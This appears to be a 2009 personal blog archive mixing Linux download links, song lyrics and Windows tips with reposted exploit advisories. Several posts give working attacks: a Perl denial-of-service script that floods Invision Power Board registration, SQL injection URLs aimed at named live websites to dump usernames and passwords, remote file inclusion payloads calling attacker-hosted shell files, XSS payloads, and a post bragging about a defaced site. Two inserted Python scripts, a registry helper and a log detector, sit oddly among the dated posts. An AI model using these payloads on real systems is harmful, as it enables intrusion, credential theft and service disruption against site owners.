Mythbuntu 9.04 and later have support for creating and hosting diskless frontend images for a network. This takes the stress out of maintaining a variety of systems, and instead puts it all into a single centralized server.

Supported architectures

Mythbuntu 9.04 Edition supports the following architectures:



* Supports x86
* Supports AMD64



Homepage and more info here:

http://www.mythbuntu.org/



Download Mythbuntu Linux v9.04 - Desktop Edition - Multi platforms:

http://cdimage.ubuntu.com/mythbuntu/releases/9.04/release/mythbuntu-9.04-desktop-i386.iso
http://cdimage.ubuntu.com/mythbuntu/releases/9.04/release/mythbuntu-9.04-desktop-amd64.iso

or

ftp://ftp.osuosl.org/pub/mythbuntu/mythbuntu-9.04-desktop-i386.iso
ftp://ftp.osuosl.org/pub/mythbuntu/mythbuntu-9.04-desktop-amd64.iso




Download Mythbuntu Linux v9.04 - Alternate Edition - Multi platforms:

http://cdimage.ubuntu.com/mythbuntu/releases/9.04/release/mythbuntu-9.04-alternate-i386.iso
http://cdimage.ubuntu.com/mythbuntu/releases/9.04/release/mythbuntu-9.04-alternate-amd64.iso

or

ftp://ftp.osuosl.org/pub/mythbuntu/mythbuntu-9.04-alternate-i386.iso
ftp://ftp.osuosl.org/pub/mythbuntu/mythbuntu-9.04-alternate-amd64.iso




Other download mirrors here:

http://www.mythbuntu.org/downloads

Xubuntu Linux v9.04 (Jaunty Jackalope) - Final



Release date: April 23, 2009

Xubuntu is a complete GNU/Linux based operating system with an Ubuntu base. It is lighter and tends to be more efficient than Ubuntu with GNOME or KDE, since it uses the Xfce Desktop environment, which makes it ideal for old or low-end machines, thin-client networks, or for those who would like to get more performance out of their hardware.

Supported architectures

Xubuntu 9.04 Edition supports the following architectures:



* Supports x86
* Supports AMD64



Homepage and more info here:

http://www.xubuntu.com/



Download Xubuntu Linux v9.04 - Desktop Edition - Multi platforms:
http://cdimage.ubuntu.com/xubuntu/releases/9.04/release/xubuntu-9.04-desktop-i386.iso
http://cdimage.ubuntu.com/xubuntu/releases/9.04/release/xubuntu-9.04-desktop-amd64.iso




Download Xubuntu Linux v9.04 - Alternate Edition - Multi platforms:

http://cdimage.ubuntu.com/xubuntu/releases/9.04/release/xubuntu-9.04-alternate-i386.iso
http://cdimage.ubuntu.com/xubuntu/releases/9.04/release/xubuntu-9.04-alternate-amd64.iso




Other download mirrors here:

http://cdimage.ubuntu.com/xubuntu/releases/

Superman Is Dead - All Angels Cry

Can you tell me why, the world is so ugly
And there ain't no pretty pictures everywhere I go
Spend some of your time, and think of the answer
Why must people get so scared most of their life
Now tell me why
Why the angels gonna cry
To see the way we live our lives, where this, the heart goes?
And tell me why
Why the angels gonna cry
I close my eyes and a better place will it come true

Walking down the street, in one bloody cold night
Where everyone is blind, they show you how to feed your hate
Education now, war for tomorrow
And I do believe we're living on a time bomb!

Superman Is Dead - Falling Down

My friend just called me up to join his party
I found myself dressing up fine, just like the king

My lady stepped beside me. Sexy, damn! She burned the place
She whispered "I will never loose this night , ever"
Tequila's blasting out my mind. Everything's about going wild.
When I looked at you, my lady! You! My friend took you! I got drunk
Then nothing I can do.

Falling down
Fall fall falling down. Tease my head out loud
Falling down
Fall falling down. Keep my face against the wall
Falling down
Fall fall falling down. Push the light against the clouds.
The night's going dark, totally dark. I'm all outta stars

Waiting for your lovely kiss that night
No one knew, I was lost in the park
And then I found someone to make me laugh
His eyes so bright, blew me away
He cares more than you

When I returned, I could not leave his burning heart alone
I though you knew what it was that I had to do
Deep in my heart, he's got a million ways to go
And sure, I like.. The great new house, the brand new cars
Your friend is mine. And so what? nothing I can do
****

Those who punish me are guilty babe
It's so great! Being a lady
Should I send you your make up bag?
Just to make you comfortable

I'm a normal girl, I am not the same
But I love his air con room
There's nothing wrong with me...again, nothing I can do
I've got someone new, I keep walking thru

I wanna know how far is hell from you?

Hey!, I am not the winner of this race!
You have to be warmer than him actually. Could you say "good luck" for my new destination ?.
You said you would be proud if I've done what's right for me.
...oh no no no no no....bullshit!

Thursday, April 23, 2009

WebPortal CMS 0.8b Multiple Remote/Local File Inclusion Vulnerabilities

script:webportal-0.8-beta
-------------------------------------------------
Author: ahmadbady
email: kivi_hacker666@yahoo.com
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-====-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=--
download from:https://sites.google.com/site/ivanoculmine/Home/webportal-0.8-beta.zip?attredirects=0

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=--=-=--===-=--=-=-=
xpl:

http://127.0.0.1/path/webportal-0.8-beta/libraries/helpdocs/help.php?lang=[local file]

http://127.0.0.1/path/webportal-0.8-beta/indexk.php?lib_path=http://site.com/shell.txt?

http://127.0.0.1/path/webportal-0.8-beta/index.php?error=[local file]
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-


# milw0rm.com [2009-04-22]



VIVA INDONESIAN CODER TEAM
Fear Nothing. Risk Everything.

Monday, March 16, 2009

Dream Theater -The Spirit Carries On

Music by Dream Theater
Lyrics by John Petrucci

Nicholas:
Where did we come from,
Why all here?
Where do we go when we die?
What lies beyond
And what lay before?
Is anything certain in life?

They say, "Life is too short,"
"The here and the now"
And "You're only given one shot"
But could there be more,
Have I lived before,
Or could this be all that we've got?

If I die tomorrow
I'd be all right
Because I believe
That after we're gone
The spirit carries on

I used to be frightened of dying
I used to think death was the end
But that was before
I'm not scared anymore
I know that my soul will transcend

I may never find all the answers
I may never understand why
I may never prove
What I know to be true
But I know that I still have to try

If I die tomorrow
I'd be all right
Because I believe
That after we're gone
The spirit carries on

Victoria:
"Move on, be brave
Don't weep at my grave
Because I am no longer here
But please never let
Your memory of me disappear"

Nicholas:
Safe in the light that surrounds me
Free of the fear and the pain
My questioning mind
Has helped me to find
The meaning in my life again
Victoria's real
I finally feel
At peace with the girl in my dreams
And now that I'm here
It's perfectly clear
I found out what all of this means

If I die tomorrow
I'd be all right
Because I believe
That after we're gone
The spirit carries on




Sunday, March 15, 2009

Invision Power Board <= 2.1.4 (Register Users) Denial of Service Exploit

#!/usr/bin/perl
use IO::Socket;
##########################################################
## _______ _______ ______ #
## |______ |______ | \ #
## ______| |______ |_____/ #
## #
##IPB Register Multiple Users Denial of Service #
##Doesn't Work on forums using "Code Confirmation" #
##Created By SkOd #
##SED security Team #
##http://www.sed-team.be #
##skod.uk@gmail.com #
##ISRAEL #
##########################################################

print q{
############################################################
# Invision Power Board Multiple Users DOS #
# Tested on IPB 2.0.1 #
# created By SkOd. SED Security Team #
############################################################
};
$rand=rand(10);
print "Forum Host: ";
$serv = ;
chop ($serv);
print "Forum Path: ";
$path = ;
chop ($path);
for ($i=0; $i<9999; $i++)
{
$name="sedXPL_".$rand.$i;
$data = "act=Reg&CODE=02&coppa_user=0&UserName=".$name."&PassWord=sedbotbeta&PassWord_Check=sedbotbeta&EmailAddress=".$name."\@host.com&EmailAddress_two=".$name."\@host.com&allow_admin_mail=1&allow_member_mail=1&day=11&month=11&year=1985&agree=1";
$len = length $data;
$get1 = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$serv", PeerPort => "80") || die "Cennot Connect Host, it's can be beacuse the host dosed";
print $get1 "POST ".$path."index.php HTTP/1.0\n";
print $get1 "Host: ".$serv."\n";
print $get1 "Content-Type: application/x-www-form-urlencoded\n";
print $get1 "Content-Length: ".$len."\n\n";
print $get1 $data;
syswrite STDOUT, "+";
}
print "Forum shuld be Dosed. Check it out...\n";

# milw0rm.com [2006-02-10]


WWW.INDONESIANCODER.COM

Wednesday, March 11, 2009

CMS WEBjump! Multiple SQL Injection Vulnerabilities

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Powered by Content Management System WEBjump! SQL Injection Vulnerability
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Author : M3NW5
contact : M3NW5@hackermail.com
GreetZ : Anggie Barker,vhiia ^,^
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

--== Dork ==--
Powered by Content Management System WEBjump! "portfolio_genre.php?id="

Exploite : www.sute.com/portfolio_genre.php?id=-67%20union%20select%201,2,@@version--

Live : http://www.leti.cz/portfolio_genre.php?id=-67%20union%20select%201,2,@@version--

--== Dork ==--
Powered by Content Management System WEBjump! "news_id.php?lang="

Exploite : www.sute.com/path/news_id.php?lang=en&id=-92%20union%20select%201,2,3,@@version,5--

Live : http://tower.klif.pl/content/news_id.php?lang=en&id=-92%20union%20select%201,2,3,@@version,5--

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

# milw0rm.com [2009-03-10]




Tuesday, March 10, 2009

Prevent DNS problems with this tip for Windows XP

When you visit a website, Windows XP tries to speed things up by placing the DNS information about that site into a DNS cache on your PC.

This is OK until there are problems with the network, the DNS server or even the website!

You see, the Windows XP DNS cache stores BOTH negative and positive entries. Positive entries are those where the DNS lookup was successful and you could connect to the website.

Negative entries are those where the DNS lookup failed and you could not connect to the website.

A problem can arise here: if the DNS cache holds a negative entry and the website you want to view is now OK to view, Windows XP will still give you a DNS error!

By default these negative entries are cached for 5 minutes. But we can tweak the registry to NOT store negative entries at all!

There is ALSO another potential pitfall with the Windows XP DNS cache...

Most ISPs and domain name registrars now update their DNS information (TTL) every 4 hours instead of the twice-daily updates that were common a few years ago.

This means that your Windows XP DNS cache may be out of date for certain entries!

So let's look at how we can tweak the registry to prevent these problems occurring:

Flush DNS

First of all, it is a good idea to flush the local DNS cache so that we start with a clean sheet!

To do this, simply enter ipconfig /flushdns in a command prompt. A window then appears confirming the flush.

[Screenshot: flushdns - Successful DNS Flush]

Now that we have a clean DNS cache, let's make the changes to the registry.


Block Negative Entries

To force Windows XP NOT to cache negative entries we need to add a new DWORD to the following Registry key:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters


DWORD: MaxNegativeCacheTtl

Value: 0

This will now ensure NO negative entries are stored.


Cache TTL

To force Windows XP to keep positive entries in DNS Cache for only 4 hours instead of the default 24 hours we need to apply the following change to the registry:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters


DWORD: MaxCacheTtl

Value: 14400

NB - make sure you enter the 14400 (seconds) as Decimal Base and NOT Hexadecimal Base!
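
The two registry values above, rendered as a .reg file and read back, as an added example that is not part of the original post. It also shows what the NB warns about: typing 14400 with the Hexadecimal base selected stores a different TTL. The function names are hypothetical.

```python
"""Render the Dnscache tweaks as .reg text and audit the stored values."""
import re

KEY = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters"

# Values from the post, in seconds, written in decimal.
SETTINGS = {"MaxNegativeCacheTtl": 0, "MaxCacheTtl": 14400}

DWORD_RE = re.compile(r'^"(?P<name>[^"]+)"=dword:(?P<hex>[0-9a-fA-F]{1,8})$')


def render_reg(key, settings):
    """Return .reg text; REG_DWORD data is always written as 8 hex digits."""
    lines = ["Windows Registry Editor Version 5.00", "", f"[{key}]"]
    for name, seconds in settings.items():
        if not 0 <= seconds <= 0xFFFFFFFF:
            raise ValueError(f"{name} does not fit in a DWORD")
        lines.append(f'"{name}"=dword:{seconds:08x}')
    return "\r\n".join(lines) + "\r\n"


def parse_reg_dwords(text):
    """Return {value name: integer} for every dword line in .reg text."""
    values = {}
    for line in text.splitlines():
        match = DWORD_RE.match(line.strip())
        if match:
            values[match["name"]] = int(match["hex"], 16)
    return values


def audit(values, expected=SETTINGS):
    """Return one finding per value that is missing or differs from the post."""
    findings = []
    for name, want in expected.items():
        got = values.get(name)
        if got is None:
            findings.append(f"{name}: missing")
        elif got != want:
            note = ""
            # Same digits interpreted as hex: the mistake the NB describes.
            if got == int(str(want), 16):
                note = " (decimal digits entered with Hexadecimal base selected)"
            findings.append(f"{name}: {got} s, expected {want} s{note}")
    return findings


if __name__ == "__main__":
    reg_text = render_reg(KEY, SETTINGS)
    print(reg_text)
    # Constructed mistake: 14400 typed into the hex field becomes 0x14400.
    wrong = reg_text.replace("dword:00003840", "dword:00014400")
    for finding in audit(parse_reg_dwords(wrong)):
        print(finding)
```
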

Now your registry key should look similar to this:

[Screenshot: dnscache]






Sunday, March 8, 2009

"This operation has been cancelled due to restrictions in effect on this computer."

A very common question in the Microsoft public newsgroups goes something like this:

When clicking on a hyperlink in an e-mail, I get this Message : "This operation has been cancelled due to restrictions in effect on this computer. Please contact your system administrator." I get this message every time that I attempt to use the hyperlink. I am the administrator on this stand alone computer. How do I deactivate this feature so that I activate hyperlinks ?

This is not an Outlook error. The most common cause is a corrupt registry key in Internet Explorer 6. The registry key found at
HKEY_Local_Machine\Software\Classes\htmlfile\shell\open\command

is either damaged or corrupt.

To fix it, try resetting Web settings in Internet Explorer. If this does not resolve the issue, you'll need to import the registry key from another computer.

Reset Web Settings

To Reset Web settings

1. Open Internet Explorer.
2. On the Tools menu, click Internet Options.
3. Click the Programs tab, and then click the Reset Web Settings button.
4. Under Internet programs, verify that the correct e-mail program is selected.
5. Click to select the Internet Explorer should check to see whether it is the default browser check box.
6. Click Apply, and then click OK.

If you receive a message when Internet Explorer starts telling you that IE is not currently your default browser, click Yes to make it your default.

Import the Registry Key

When resetting the web settings doesn't help, you'll need to recreate the corrupt key. The easiest way to do this is by exporting the key from another computer.

To save exporting it from another computer, right click here to download a registry key exported from my computer. Choose Save target as and change the file extension from txt to reg and double click on it to run it.

If you prefer to use a key from a computer you have access to, follow the instructions in You receive an error message when you click a hyperlink in Outlook.

Set Program Access in Control Panel

Windows XP and Vista allow you to control program defaults through Control Panel, Add and Remove Programs, Set Program Access and Defaults. If the above methods fail, use this method to set the default browser.

Other Causes

There are several other causes of this error. In most cases, they do not affect hyperlinks in Outlook. If you found this page searching for the error message, check out the following pages. Note that if you receive this error on a computer at work, you should contact your administrator, they may want access to applications restricted for security reasons.

You receive the message when:
# Using Outlook 2002 SP3
# Trying to run a program
# Saving a document (Windows 2000)
# Accessing file open dialog
# Starting Windows Explorer

Search Microsoft (using Google) for additional articles

More Information

You receive an error message when you click a hyperlink in Outlook



Friday, March 6, 2009

Jogjacamp JProfile Gold (id_news) Remote SQL Injection Vulnerability

Jogjacamp JProfile Gold SQL Injection

by kecemplungkalen

Vendor : http://jogjacamp.com

bugs : /index.php?action=news.detail&id_news=

exploit : union select concat(username,0x3a,password),2,3 from phpss_account--

POC : http://www.titiandamai.org/index.php?action=news.detail&id_news=6%20union%20select%20concat(username,0x3a,password),2,3%20from%20phpss_account%20--

http://www.ligaindonesia.com/index.php?action=news.detail&id_news=1976%20%20union%20select%20concat(username,0x3a,password),2,3%20from%20phpss_account%20--

http://hermawan.net/index.php?action=news.detail&id_news=42%20union%20select%20concat(username,0x3a,password),2,3%20from%20phpss_account%20--

###############################################################

greetz : Allah
s3t4n and Paman aka Jack-
my family
and all Mainhack BrotherHood
jupe crew jangan ngegame melulu :p

# milw0rm.com [2009-03-03]



Wednesday, March 4, 2009

Make a PHP info file

This tutorial will show you how to display Apache PHP configuration.
It is useful in cases when you are going to install a particular application which needs specific requirements like register_globals or long_array turned On or Off.

This can be done by simply uploading one file, for example 'info.php' with the following code included inside:




<?php

// Print all information.
phpinfo();

// Output only the module information.
phpinfo(INFO_MODULES);

?>


Create a text file with your favorite text editor, such as Notepad, then copy and paste the code above into it. Save the file as, for example, info.php and then upload it to your server.
Then browse to http://yourdomain.tld/info.php and you should see a table with the current PHP configuration and module information.





SSH Explorer SSH Client



SSH Explorer is a new generation SSH/Telnet client and terminal emulator that makes remote Linux server administration look like much more fun than it actually is.
File View panel lets you navigate through and operate with remote directories and files as effortlessly as if they were on your home computer.

The integrated text editor will be a great tool for people who don't like the awkward vi and emacs interface.

SSH Explorer also includes a pack of useful Linux commands and allows you to create your own snippets so you don't have to remember and type them anymore. VT100 terminal emulation, SSH1, SSH2 and Telnet protocols are supported.

PCWIN[dot]COM


Friday, February 27, 2009

Hash Cracked


Cracked Hash


Thursday, February 26, 2009

Malingsial Site pwned



Domain: http://tukulesto.gtfsabah.com/
Mirror: http://www.evilc0der.com/mirror/7050/
uname -a: Linux netserv.netkl.org
uid=99(nobody) gid=99(nobody) groups=99(nobody)




[waraxe-2004-SA#031] Multiple vulnerabilities in e107 version 0.615

www.waraxe.us

Author: Janek Vind "waraxe"
Date: 29. May 2004
Location: Estonia, Tartu
Web: http://www.waraxe.us/index.php?modname=sa&id=31

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From the official e107 Website - e107 is a portal / content management system powered by PHP and mySQL that gives you a totally dynamic and professional website out of the box.
It's simple wizard type install process will have you up and running in 5 minutes, and best of all it's completely free.

Homepage: http://e107.org/

Vulnerabilities:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
First of all, some conditions have to be met on victim server, to be vulnerable:

1. "register_globals" must be "on"
2. mysql must be version 4.x with enabled UNION functionality.

Now, let's discuss those security flaws:

A - Full Path Disclosure:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Many software developers, webmasters, admins and other IT staff underestimate full path disclosure as a security bug.
Anyway, this information - the full path to a script - must be kept secret when possible, or it becomes one little piece of the puzzle among many other pieces, which finally leads to a successful attack on the website.

A1 - many scripts can be accessed directly and this will provoke standard php error messages, which leads to full path disclosure.

Examples:
http://localhost/e107_0615/e107_plugins/alt_news/alt_news.php
http://localhost/e107_0615/e107_plugins/backend_menu/backend_menu.php
http://localhost/e107_0615/e107_plugins/clock_menu/clock_menu.php
http://localhost/e107_0615/e107_plugins/counter_menu/counter_menu.php
http://localhost/e107_0615/e107_plugins/login_menu/login_menu.php

... and many-many more, needed to be fixed!

B - Cross-site scripting aka XSS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
A potential attacker can use XSS to steal cookies, read cross-domain forms, etc.
Finally, it can lead to admin account compromise and takeover of the website.

B1 - xss in clock_menu.php through direct access of the script:
http://localhost/e107_0615/e107_plugins/clock_menu/clock_menu.php?clock_flat=1&LAN_407=foo%22); //--%3E%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

B2 - xss in feature called "email article to a friend":
attacker must be logged off and will enter to inputfield "logged name" this: foobar'>

B3 - xss in feature called "submit news":
Attacker is logged off and will enter to inputfield "logged name" this: foobar'>

B4 - xss in "user settings":
attacker is logged on and makes POST request like this: http://localhost/e107_0615/usersettings.php?avmsg=[xss code here]


C - Remote file inclusion:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Remote inclusion - this is VERY DANGEROUS security hole.
If php is configured with "allow_url_fopen=on" and there is no firewall, which blocks outbound connections, then potential attacker can force VICTIM's php engine to parse ATTACKER's php code!!
This can lead to shell-level server compromise (if there are permissions to execute system commands) with "nobody" or "apache" privileges.
Attacker can then try some local r00t exploits and finally server is 0wned ;)

C1 - remote file inclusion in "secure_img_render.php"
script: http://localhost/e107_0615/e107_handlers/secure_img_render.php?p=http://attacker.com/evil.php
Remark: "register_globals" must be "on" for exploitation in this way to succeed.

D - Sql injection
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Through SQL injection a potential attacker can gather any information he wants from the database,
including the admin's username and the MD5 hash of the password.
From there it is only 1...2 more steps to taking over the admin's account...

D1 - critical sql injection bug #1 in "content.php" script:
http://localhost/e107_0615/content.php?content.99/**/UNION/**/SELECT/**/null,null,null,CONCAT(user_name,CHAR(58),user_email,CHAR(58),user_password),null,null,null,null,null,null,null,null,null/**/FROM/**/e107_user/**/WHERE/**/user_id=1/*

D2 - critical sql injection bug #2 in "content.php" script:
http://localhost/e107_0615/content.php?query=content_id=99%20UNION%20select%20null,CONCAT(user_name,CHAR(58),user_email,CHAR(58),user_password),null,null,null,null,null,null,null,null,null,null,null%20FROM%20e107_user%20WHERE%20user_id=1/*

D3 - critical sql injection bug in "news.php" script:
http://localhost/e107_0615/news.php?list.99/**/UNION/**/SELECT/**/null,null,CONCAT(user_name,CHAR(58),user_email,CHAR(58),user_password),null,null,null,null,null,null,null,null,null/**/FROM/**/e107_user/**/WHERE/**/user_id=1/*

How to fix:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
First of all, I suggest using the newer version 0.616, which seems to be patched against the bugs discussed above.
And of course, you are welcome to visit forum on my homepage at http://www.waraxe.us/forum/ , where you can find tutorial about manual fixes.

See ya there!

Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Greets to Raido Kerna and to http://www.gamecheaters.us staff!
Special greets to icenix for helping me in bughunting!

Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
come2waraxe@yahoo.com
Janek Vind "waraxe"
Homepage: http://www.waraxe.us/

---------------------------------- [ EOF ] ------------------------------------
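
For operators who cannot upgrade at once, the request shapes in sections B1, C1 and D1-D3 can be looked for in web server access logs. The following is an added example, not part of the advisory: the log lines are constructed, the rule labels and function names are hypothetical, and legitimate parameters that carry a URL will also match the remote-include rule.

```python
"""Flag access-log requests shaped like the advisory's XSS, RFI and SQLi URLs."""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed Common Log Format lines (documentation IPs, not real traffic).
SAMPLE_LOG = "\n".join([
    '198.51.100.7 - - [29/May/2004:10:00:01 +0000] "GET /e107_0615/news.php HTTP/1.0" 200 5120',
    '198.51.100.7 - - [29/May/2004:10:00:05 +0000] "GET /e107_0615/content.php?content.99/**/UNION/**/SELECT/**/null,null/**/FROM/**/e107_user/* HTTP/1.0" 200 812',
    '198.51.100.7 - - [29/May/2004:10:00:09 +0000] "GET /e107_0615/content.php?query=content_id=99%20UNION%20select%20null,null%20FROM%20e107_user/* HTTP/1.0" 200 640',
    '203.0.113.9 - - [29/May/2004:10:01:00 +0000] "GET /e107_0615/e107_handlers/secure_img_render.php?p=http://attacker.example/evil.php HTTP/1.0" 200 77',
    '203.0.113.9 - - [29/May/2004:10:01:30 +0000] "GET /e107_0615/e107_plugins/clock_menu/clock_menu.php?clock_flat=1&LAN_407=foo%22);%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.0" 200 300',
    '192.0.2.44 - - [29/May/2004:10:02:00 +0000] "GET /search.php?q=credit+union HTTP/1.0" 200 900',
    '192.0.2.44 - - [29/May/2004:10:02:10 +0000] "GET /e107_0615/news.php?list.99%2520UNION%2520SELECT%2520null HTTP/1.0" 200 410',
])

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+'
)
SQLI_RE = re.compile(r"\bunion\s+(?:all\s+)?select\b")
XSS_RE = re.compile(r"<\s*script\b")
REMOTE_RE = re.compile(r"^\s*(?:https?|ftp)://")


def normalise(text):
    """Undo the encodings used to hide keywords, then lowercase."""
    text = text.replace("+", " ")
    for _ in range(2):                       # single and double percent-encoding
        text = unquote(text)
    text = re.sub(r"/\*.*?\*/", " ", text)   # /**/ comments standing in for spaces
    return re.sub(r"\s+", " ", text).lower()


def classify(uri):
    """Return the sorted rule labels that a request URI matches."""
    raw_query = urlsplit(uri).query
    query = normalise(raw_query)
    hits = set()
    # The advisory's D1/D3 URLs have no '=', so scan the whole query string.
    if SQLI_RE.search(query):
        hits.add("sqli-union")
    if XSS_RE.search(query):
        hits.add("xss-script-tag")
    # A parameter whose value is itself a URL is the C1 inclusion shape.
    for _, value in parse_qsl(raw_query, keep_blank_values=True):
        if REMOTE_RE.match(normalise(value)):
            hits.add("remote-include")
    return sorted(hits)


def scan(log_text):
    """Return (client ip, uri, labels) for every log line that matches a rule."""
    findings = []
    for line in log_text.splitlines():
        match = LINE_RE.match(line)
        if not match:
            continue
        labels = classify(match["uri"])
        if labels:
            findings.append((match["ip"], match["uri"], labels))
    return findings


if __name__ == "__main__":
    for ip, uri, labels in scan(SAMPLE_LOG):
        print(ip, ",".join(labels), uri[:60])
```
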


Thursday, February 19, 2009

md5 hash result


Tuesday, February 17, 2009

Reel Big Fish - Where Have You Been?

You called me up last night in tears and said you missed me after all these years
But Ive been waiting here so long, Ive gotten over it since youve been gone
You called me up last night again and said youre finished with your new boyfriend
Asked if you could come back home- so sorry that you left me all alone

You say you love me, you love me again but if you love me- where have you been?
You say you need me more than anyone else well go to hell, where have you been?
You showed up at my door today and said my friend why do you push me away
Life with him was just so dull and what we had was something wonderful

You say you love me, you love me again but if you love me- where have you been?
You say you need me more than anyone else well go to hell- where have you been?
I said you wish! I dont need this! what makes you think Id ever want you again?
Yeah right! as if! what makes you think Id ever want you again?

